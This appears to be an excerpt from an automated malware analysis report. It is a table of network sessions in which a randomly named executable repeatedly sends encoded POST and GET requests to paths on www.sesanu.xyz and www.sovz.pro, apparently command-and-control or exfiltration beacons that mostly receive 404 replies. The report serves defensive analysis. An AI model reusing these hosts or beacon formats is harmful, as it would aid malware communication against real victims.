21	192.168.2.8	60431	199.192.21.169	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:09.818447113 CET	730	OUT	POST /rf25/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sesanu.xyz Origin: http://www.sesanu.xyz Referer: http://www.sesanu.xyz/rf25/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 32 49 58 32 44 43 54 4c 63 33 6a 47 39 44 64 74 45 6c 62 49 70 30 78 63 56 48 6c 45 30 73 32 6c 52 51 64 31 47 77 74 43 4d 39 30 76 44 55 55 45 54 73 6f 6c 59 63 59 79 50 52 56 32 69 79 32 36 34 58 2f 73 51 76 4b 37 48 56 6d 50 41 46 51 73 4a 65 30 73 75 43 52 46 38 78 63 72 36 59 45 4e 64 71 33 2f 6b 49 39 36 68 75 50 45 66 6f 54 58 55 44 68 61 61 77 49 31 71 53 75 6b 70 4f 56 4c 46 44 69 45 69 41 42 7a 68 30 50 7a 64 77 4e 75 4f 2f 55 44 6d 58 4e 4c 35 6c 51 72 6f 39 34 67 32 7a 38 70 62 42 43 66 57 51 46 7a 53 72 41 4d 44 47 43 6c 2f 74 73 6a 54 34 38 6b 4a 34 30 62 53 74 58 39 56 43 41 3d Data Ascii: O2ePNNH0=2IX2DCTLc3jG9DdtElbIp0xcVHlE0s2lRQd1GwtCM90vDUUETsolYcYyPRV2iy264X/sQvK7HVmPAFQsJe0suCRF8xcr6YENdq3/kI96huPEfoTXUDhaawI1qSukpOVLFDiEiABzh0PzdwNuO/UDmXNL5lQro94g2z8pbBCfWQFzSrAMDGCl/tsjT48kJ40bStX9VCA=
Jan 6, 2025 16:04:10.405318975 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 15:04:10 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	60432	199.192.21.169	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:12.367327929 CET	750	OUT	POST /rf25/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sesanu.xyz Origin: http://www.sesanu.xyz Referer: http://www.sesanu.xyz/rf25/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 32 49 58 32 44 43 54 4c 63 33 6a 47 2f 67 46 74 47 47 6a 49 2b 45 78 54 66 6e 6c 45 2b 4d 32 68 52 51 42 31 47 78 70 53 4d 50 67 76 45 30 45 45 53 70 55 6c 49 4d 59 79 61 68 56 7a 38 43 32 39 34 58 37 6b 51 75 32 37 48 56 43 50 41 48 49 73 4a 70 67 72 6f 43 52 4c 70 68 63 70 6e 49 45 4e 64 71 33 2f 6b 49 70 63 68 71 6a 45 63 59 6a 58 57 68 4a 62 53 51 49 32 39 69 75 6b 74 4f 56 51 46 44 6a 58 69 42 63 6f 68 79 4c 7a 64 31 78 75 4f 72 41 41 7a 48 4e 4a 68 46 52 75 67 4d 64 4e 77 43 67 31 52 43 6d 4c 58 41 4d 4c 54 64 78 6d 5a 6b 4b 6a 38 74 45 49 54 37 55 53 4d 50 70 7a 49 4f 48 4e 4c 56 56 43 51 45 47 53 4b 2f 6e 49 43 6e 64 65 68 50 4f 79 4d 36 54 76 Data Ascii: O2ePNNH0=2IX2DCTLc3jG/gFtGGjI+ExTfnlE+M2hRQB1GxpSMPgvE0EESpUlIMYyahVz8C294X7kQu27HVCPAHIsJpgroCRLphcpnIENdq3/kIpchqjEcYjXWhJbSQI29iuktOVQFDjXiBcohyLzd1xuOrAAzHNJhFRugMdNwCg1RCmLXAMLTdxmZkKj8tEIT7USMPpzIOHNLVVCQEGSK/nICndehPOyM6Tv
Jan 6, 2025 16:04:13.021442890 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 15:04:12 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	60433	199.192.21.169	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:14.911828041 CET	1767	OUT	POST /rf25/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sesanu.xyz Origin: http://www.sesanu.xyz Referer: http://www.sesanu.xyz/rf25/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 32 49 58 32 44 43 54 4c 63 33 6a 47 2f 67 46 74 47 47 6a 49 2b 45 78 54 66 6e 6c 45 2b 4d 32 68 52 51 42 31 47 78 70 53 4d 50 34 76 44 43 49 45 54 4b 38 6c 61 63 59 79 47 78 56 79 38 43 33 68 34 54 58 67 51 75 36 30 48 58 4b 50 42 69 63 73 50 59 67 72 39 79 52 4c 78 52 63 71 36 59 46 50 64 70 66 37 6b 49 35 63 68 71 6a 45 63 62 72 58 66 54 68 62 66 77 49 31 71 53 76 72 70 4f 55 65 46 44 72 48 69 42 70 64 68 69 72 7a 64 52 74 75 49 64 38 41 75 33 4e 78 30 46 52 49 67 4d 68 4f 77 43 39 4f 52 44 43 68 58 44 73 4c 52 61 42 78 46 51 53 73 6a 66 52 38 61 71 63 6f 50 73 59 57 4c 75 48 64 4d 30 4e 36 66 6a 62 6d 42 38 54 65 42 57 56 54 6a 2b 53 2f 41 50 32 78 68 72 4c 2b 54 36 54 30 6e 79 46 4d 46 2f 69 4e 6c 33 5a 2b 2b 68 72 34 76 78 47 36 4d 76 77 4f 56 50 74 6b 67 47 6c 5a 55 6a 37 49 49 59 69 62 5a 72 4f 71 72 6f 41 50 71 31 2f 4f 49 51 78 6e 68 30 76 4d 52 30 55 4a 4c 55 33 66 2f 6e 67 35 34 59 79 48 6f 37 52 51 46 32 49 64 6d 63 6d 44 75 6f 72 58 77 49 4d 64 68 61 69 49 32 [TRUNCATED] Data Ascii: O2ePNNH0=2IX2DCTLc3jG/gFtGGjI+ExTfnlE+M2hRQB1GxpSMP4vDCIETK8lacYyGxVy8C3h4TXgQu60HXKPBicsPYgr9yRLxRcq6YFPdpf7kI5chqjEcbrXfThbfwI1qSvrpOUeFDrHiBpdhirzdRtuId8Au3Nx0FRIgMhOwC9ORDChXDsLRaBxFQSsjfR8aqcoPsYWLuHdM0N6fjbmB8TeBWVTj+S/AP2xhrL+T6T0nyFMF/iNl3Z++hr4vxG6MvwOVPtkgGlZUj7IIYibZrOqroAPq1/OIQxnh0vMR0UJLU3f/ng54YyHo7RQF2IdmcmDuorXwIMdhaiI2uwse9sqbL2dQP2PuywchjJVp6BSW0x9bxV/m7zQy9/AhJdHx4KyI3IK9OglngUWXL/WxNbAJpH6zdHqTeFVstS9H0cIfaWzX/FEcn1jAfzRC8yHEl/1l1DJFPDSKAv4WMcFKioQKCcyHmseaHEtpUN6RTpEK7EfPihOOUo8dlMpZW70zJtiLE/t7dq/uJ8GXRbxzefiX6s5O/7cS+LMnlBvXfpgDX9M+0YaZS2amKWZoiGShBzTzjHxXk/hBG7dGavx2UkpO7UpTEZAt6iBhicfI65PvbGy0WC/y9ISw5aG8n/rpEgdLm+L8f6PSPL/zkdQEQ5uQJkiQ0gxJmJoDam0/iWGt1v3LS78jYnoAvPdJctq7XvmaHXapFc2Z6YCrGyOApTSvKZFVLasAnrcwxohFBnEYj95hw86abWdmpEZoh00Dnh9o10UBoKL3o7dv/eX7CujdnQmUyOuRy5mtVnff8BDXmFClIzsgsCwI8hibwFDnDcJGvQvc6e85+pGj8e2hZMRiS5JXTWUrESnKSHrHMe+mRGpys1oXKdzBzWXw6yUkVp4ftxpmazDbdVGWVtt6xQ4k2PHaBZO4Q7JmY+uzubQrsSuLU/f1zPuVCUozngd/Mu88LmEvL91dBt9nncSb9T3rdqnxpPEO8RGIFkid6q5KBJpsEv [TRUNCATED]
Jan 6, 2025 16:04:15.500843048 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 15:04:15 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	60434	199.192.21.169	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:17.466837883 CET	477	OUT	GET /rf25/?O2ePNNH0=7K/WA23tcmDFyzNMGH/quV9PRW4j8/nmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1hsIoixanfRydq2t2v9Un+mneZn3egUEahovskKrleZAWw==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.sesanu.xyz Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:04:18.080249071 CET	933	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 15:04:17 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	60435	45.130.41.107	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:23.344985008 CET	724	OUT	POST /vwha/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sovz.pro Origin: http://www.sovz.pro Referer: http://www.sovz.pro/vwha/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 7a 33 37 46 4d 71 64 4a 59 59 7a 44 32 72 4d 55 78 33 6c 6b 6c 70 4a 43 41 58 56 6c 55 35 78 6e 64 44 48 58 74 43 6c 42 77 6f 64 53 48 7a 70 2f 33 31 6d 31 6c 38 6c 61 62 34 31 30 43 59 37 70 54 48 68 53 6e 44 33 65 72 57 65 73 34 50 41 62 71 56 34 67 42 68 47 49 4d 44 73 2f 6a 55 4c 61 39 4d 4d 52 59 4f 53 74 4b 4c 6d 59 79 39 49 6f 58 77 62 70 78 59 41 2f 66 77 4c 68 30 6c 5a 62 6d 78 61 52 44 69 4f 62 56 76 55 70 41 6f 4f 5a 74 74 76 5a 4c 33 37 64 45 5a 63 32 41 39 72 73 38 43 50 7a 75 55 4c 73 31 37 46 6a 2f 54 4c 56 2b 57 73 76 62 69 57 34 45 73 53 62 39 47 74 74 67 62 4c 4a 55 70 41 3d Data Ascii: O2ePNNH0=z37FMqdJYYzD2rMUx3lklpJCAXVlU5xndDHXtClBwodSHzp/31m1l8lab410CY7pTHhSnD3erWes4PAbqV4gBhGIMDs/jULa9MMRYOStKLmYy9IoXwbpxYA/fwLh0lZbmxaRDiObVvUpAoOZttvZL37dEZc2A9rs8CPzuULs17Fj/TLV+WsvbiW4EsSb9GttgbLJUpA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	60436	45.130.41.107	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:26.074938059 CET	744	OUT	POST /vwha/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sovz.pro Origin: http://www.sovz.pro Referer: http://www.sovz.pro/vwha/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 7a 33 37 46 4d 71 64 4a 59 59 7a 44 73 49 45 55 79 51 4a 6b 30 5a 4a 44 63 6e 56 6c 66 5a 77 50 64 44 44 58 74 44 52 52 77 36 35 53 48 57 74 2f 35 55 6d 31 6b 38 6c 61 4f 49 31 78 47 59 36 6c 54 48 73 6e 6e 41 76 65 72 57 4b 73 34 50 51 62 71 6b 34 76 41 78 48 75 56 54 73 48 74 30 4c 61 39 4d 4d 52 59 4f 47 44 4b 50 4b 59 79 4e 34 6f 58 52 62 32 79 59 41 34 56 51 4c 68 6a 56 5a 41 6d 78 61 6a 44 6d 4f 68 56 74 73 70 41 71 47 5a 73 34 44 61 42 33 37 68 62 70 64 49 49 65 76 67 30 6c 4c 4a 69 56 2f 57 37 4a 52 5a 33 46 36 2f 6b 30 6b 70 59 69 2b 54 45 76 36 74 34 78 77 46 36 34 62 35 4b 2b 56 4c 37 57 4b 67 6e 34 35 36 4a 44 38 6d 59 6f 48 72 77 6d 2b 48 Data Ascii: O2ePNNH0=z37FMqdJYYzDsIEUyQJk0ZJDcnVlfZwPdDDXtDRRw65SHWt/5Um1k8laOI1xGY6lTHsnnAverWKs4PQbqk4vAxHuVTsHt0La9MMRYOGDKPKYyN4oXRb2yYA4VQLhjVZAmxajDmOhVtspAqGZs4DaB37hbpdIIevg0lLJiV/W7JRZ3F6/k0kpYi+TEv6t4xwF64b5K+VL7WKgn456JD8mYoHrwm+H
Jan 6, 2025 16:04:27.227297068 CET	475	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 06 Jan 2025 15:04:27 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA\|2RU#a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	60437	45.130.41.107	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:28.615400076 CET	1761	OUT	POST /vwha/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sovz.pro Origin: http://www.sovz.pro Referer: http://www.sovz.pro/vwha/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 7a 33 37 46 4d 71 64 4a 59 59 7a 44 73 49 45 55 79 51 4a 6b 30 5a 4a 44 63 6e 56 6c 66 5a 77 50 64 44 44 58 74 44 52 52 77 36 78 53 48 41 52 2f 35 33 2b 31 69 4d 6c 61 50 49 31 77 47 59 37 2f 54 48 30 72 6e 41 6a 6f 72 55 79 73 34 74 6f 62 73 57 51 76 4b 78 48 75 49 44 73 38 6a 55 4b 41 39 4d 64 61 59 4f 57 44 4b 50 4b 59 79 4c 30 6f 44 51 62 32 2f 34 41 2f 66 77 4c 74 30 6c 59 76 6d 78 44 57 44 6d 43 4c 56 63 4d 70 41 4b 32 5a 76 4f 33 61 4a 33 37 6e 61 70 64 41 49 5a 6d 2b 30 6b 6a 2f 69 56 4c 38 37 4c 78 5a 33 45 57 6a 32 51 77 50 44 52 6a 6e 63 2b 2b 30 31 78 77 32 38 37 53 49 50 64 46 75 31 68 4b 76 6d 4f 70 47 47 55 64 4f 4d 63 50 6d 35 41 44 50 6b 32 62 6b 45 61 4f 79 46 75 6d 31 45 57 52 6b 5a 4e 6e 2f 4c 59 41 72 32 45 35 44 4c 6c 4f 44 48 4c 4e 4f 2f 65 50 58 67 38 74 4d 44 38 38 2f 64 35 76 42 48 7a 57 51 72 56 73 4b 4c 42 2f 64 56 46 61 6e 4c 64 57 63 50 2b 49 77 52 76 54 43 43 53 31 7a 2f 65 66 41 55 35 30 62 70 4a 46 35 67 61 6e 51 4a 4c 77 65 49 74 4b 44 64 [TRUNCATED] Data Ascii: O2ePNNH0=z37FMqdJYYzDsIEUyQJk0ZJDcnVlfZwPdDDXtDRRw6xSHAR/53+1iMlaPI1wGY7/TH0rnAjorUys4tobsWQvKxHuIDs8jUKA9MdaYOWDKPKYyL0oDQb2/4A/fwLt0lYvmxDWDmCLVcMpAK2ZvO3aJ37napdAIZm+0kj/iVL87LxZ3EWj2QwPDRjnc++01xw287SIPdFu1hKvmOpGGUdOMcPm5ADPk2bkEaOyFum1EWRkZNn/LYAr2E5DLlODHLNO/ePXg8tMD88/d5vBHzWQrVsKLB/dVFanLdWcP+IwRvTCCS1z/efAU50bpJF5ganQJLweItKDdXCWySBdSX5XnesnChhmElFffuteM3SlQGK+4dh6484uuzgF00cot0a9dRLdqmoLNIKmRJdXmU7QjvqTEogRRYSf8Ypo7UpJz2FR+NmR/6Y/7z0ESwzmjQUoIRjOuAD+8CkjZ87sBF34mrwGLeiFRp1aG6qYjpG1c8Ke+NuWLGFpRwVG46YH01rXG3PDRAE7lLwjSGFUg67XyTjcrdGq7bGtv/PmfhgOslz3xTObExRdeGmfO3sWN6oR3Q3IvnSsIMM77QK5Z5T2rIkkK+Z9XRHdACZ9ArrU20VmDPsxVYtx6VyHoQD75iooWuVnFPld+2vf9aLyYPX2te1wutNw8G3RVYtThUoYRsEPKcrTwJV92JyG7nrK2com822rbSB1kReWPP8BMK2Bz0gVE5ZTp1UA/3f8pDr2LJm/VR2Sf9uva6hnJNelbtDB+BdmT6nxxvaEbicYmo